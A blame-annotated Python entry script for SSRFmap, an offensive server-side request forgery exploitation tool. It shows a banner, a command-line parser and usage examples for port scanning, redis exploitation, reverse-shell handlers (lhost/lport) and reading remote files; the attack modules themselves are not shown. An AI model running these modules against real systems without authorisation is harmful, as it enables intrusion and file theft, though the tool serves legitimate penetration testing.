2018-10-15 19:22:04 +00:00
|
|
|
#!/usr/bin/python
|
|
|
|
from core.ssrf import SSRF
|
|
|
|
import argparse
|
|
|
|
import logging
|
2019-07-07 20:05:31 +00:00
|
|
|
import urllib3
|
2022-03-16 18:27:30 +00:00
|
|
|
|
2018-10-15 19:22:04 +00:00
|
|
|
def display_banner():
|
2024-06-08 18:59:26 +00:00
|
|
|
print(r" _____ _________________ ")
|
|
|
|
print(r"/ ___/ ___| ___ \ ___| ")
|
|
|
|
print(r"\ `--.\ `--.| |_/ / |_ _ __ ___ __ _ _ __ ")
|
|
|
|
print(r" `--. \`--. \ /| _| '_ ` _ \ / _` | '_ \ ")
|
|
|
|
print(r"/\__/ /\__/ / |\ \| | | | | | | | (_| | |_) |")
|
|
|
|
print(r"\____/\____/\_| \_\_| |_| |_| |_|\__,_| .__/ ")
|
|
|
|
print(r" | | ")
|
|
|
|
print(r" |_| ")
|
2018-10-15 19:22:04 +00:00
|
|
|
|
|
|
|
def parse_args():
|
2019-07-07 22:02:56 +00:00
|
|
|
example_text = '''Examples:
|
2024-06-08 18:48:06 +00:00
|
|
|
python ssrfmap.py -r examples/request2.txt -p url -m portscan
|
|
|
|
python ssrfmap.py -r examples/request.txt -p url -m redis
|
|
|
|
python ssrfmap.py -r examples/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
|
|
|
|
python ssrfmap.py -r examples/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
|
|
|
|
python ssrfmap.py -r examples/request.txt -p url -m readfiles --rfiles
|
2019-07-07 22:02:56 +00:00
|
|
|
'''
|
|
|
|
parser = argparse.ArgumentParser(epilog=example_text, formatter_class=argparse.RawDescriptionHelpFormatter)
|
2018-10-15 19:22:04 +00:00
|
|
|
parser.add_argument('-r', action ='store', dest='reqfile', help="SSRF Request file")
|
|
|
|
parser.add_argument('-p', action ='store', dest='param', help="SSRF Parameter to target")
|
|
|
|
parser.add_argument('-m', action ='store', dest='modules', help="SSRF Modules to enable")
|
2020-01-09 02:53:44 +00:00
|
|
|
parser.add_argument('-l', action ='store', dest='handler', help="Start an handler for a reverse shell", nargs='?', const='1')
|
2024-06-08 23:13:53 +00:00
|
|
|
parser.add_argument('-v', action ='store_true', dest='verbose', help="Enable verbosity")
|
2024-06-10 12:56:13 +00:00
|
|
|
parser.add_argument('--lhost', action ='store', dest='lhost', help="LHOST reverse shell or IP to target in the network")
|
|
|
|
parser.add_argument('--lport', action ='store', dest='lport', help="LPORT reverse shell or port to target in the network")
|
|
|
|
parser.add_argument('--ldomain', action ='store', dest='ldomain', help="Domain to target for AXFR query or domain related modules")
|
2021-02-02 22:34:38 +00:00
|
|
|
parser.add_argument('--rfiles', action ='store', dest='targetfiles', help="Files to read with readfiles module", nargs='?', const=True)
|
2019-02-18 12:33:24 +00:00
|
|
|
parser.add_argument('--uagent',action ='store', dest='useragent', help="User Agent to use")
|
|
|
|
parser.add_argument('--ssl', action ='store', dest='ssl', help="Use HTTPS without verification", nargs='?', const=True)
|
2022-03-23 10:45:34 +00:00
|
|
|
parser.add_argument('--proxy', action ='store', dest='proxy', help="Use HTTP(s) proxy (ex: http://localhost:8080)")
|
2019-02-18 12:33:24 +00:00
|
|
|
parser.add_argument('--level', action ='store', dest='level', help="Level of test to perform (1-5, default: 1)", nargs='?', const=1, default=1, type=int)
|
2021-02-02 22:34:38 +00:00
|
|
|
results = parser.parse_args()
|
2018-10-15 19:22:04 +00:00
|
|
|
|
|
|
|
if results.reqfile == None:
|
|
|
|
parser.print_help()
|
|
|
|
exit()
|
|
|
|
|
|
|
|
return results
|
|
|
|
|
|
|
|
if __name__ == "__main__":
|
2019-07-07 20:05:31 +00:00
|
|
|
# disable ssl warning for self signed certificate
|
|
|
|
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
|
|
|
|
|
|
|
|
# enable custom logging
|
2022-03-16 18:27:30 +00:00
|
|
|
logging.basicConfig(
|
|
|
|
level=logging.INFO,
|
|
|
|
format="[%(levelname)s]:%(message)s",
|
|
|
|
handlers=[
|
|
|
|
logging.FileHandler("SSRFmap.log", mode='w'),
|
|
|
|
logging.StreamHandler()
|
|
|
|
]
|
|
|
|
)
|
|
|
|
|
2024-06-08 23:13:53 +00:00
|
|
|
logging.addLevelName(logging.WARNING, "\033[1;31m%s\033[1;0m" % logging.getLevelName(logging.WARNING))
|
|
|
|
logging.addLevelName(logging.ERROR, "\033[1;41m%s\033[1;0m" % logging.getLevelName(logging.ERROR))
|
2018-10-15 19:22:04 +00:00
|
|
|
display_banner()
|
2019-07-07 20:05:31 +00:00
|
|
|
|
2024-06-08 23:13:53 +00:00
|
|
|
# handle verbosity
|
2018-10-15 19:22:04 +00:00
|
|
|
args = parse_args()
|
2024-06-08 23:13:53 +00:00
|
|
|
if args.verbose is True:
|
|
|
|
logging.getLogger().setLevel(logging.DEBUG)
|
|
|
|
logging.debug("Verbose output is enabled")
|
|
|
|
|
|
|
|
# SSRFmap
|
2021-02-02 22:34:38 +00:00
|
|
|
ssrf = SSRF(args)
|
2024-06-08 23:13:53 +00:00
|
|
|
|